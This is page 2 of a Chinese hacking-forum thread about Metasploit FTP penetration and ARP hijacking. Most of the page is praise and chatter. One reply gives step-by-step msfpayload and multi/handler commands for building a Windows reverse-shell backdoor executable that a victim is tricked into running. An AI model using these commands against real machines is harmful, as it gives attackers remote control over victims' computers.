qianxi 发表于 2014-10-28 19:18:42

一直都想认识大牛!

颜筱诺 发表于 2014-10-29 00:00:08

又是内网么?小伙伴?内网渗透不少了吧- -

2119 发表于 2014-10-29 15:16:39

好强大:lol

SafetyQ 发表于 2014-10-29 23:27:19

学习 谢谢楼主分享

milkeway 发表于 2014-10-30 12:44:25

本帖最后由 milkeway 于 2014-10-30 12:50 编辑

lingfeng 发表于 2014-10-27 09:32
求解大牛payload怎么弹回来。

用payload 生成一个后门如果是路由映射一下。。生成后 进入反弹的那个插件下。。。

像这样。msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 X >/root/a.exe               然后use exploits/multi/handler然后use exploits/multi/handler 然后
set PAYLOAD windows/shell/reverse_tcp 这里payload 要设置成跟前边的一样,参数也要一样set LHOST 127.0.0.1 (你的IP)然后exploit 等待用户执行a.exe

milkeway 发表于 2014-10-30 13:05:30

qianxi 发表于 2014-10-28 19:18
一直都想认识大牛!

Q1225780196

18224da07fe6f26 发表于 2014-10-31 20:19:04

KD、 发表于 2014-11-13 12:04:28

恩,挺吊!!!
页: 1 [2]
查看完整版本: msf ftp渗透+ARP劫持 内容很叼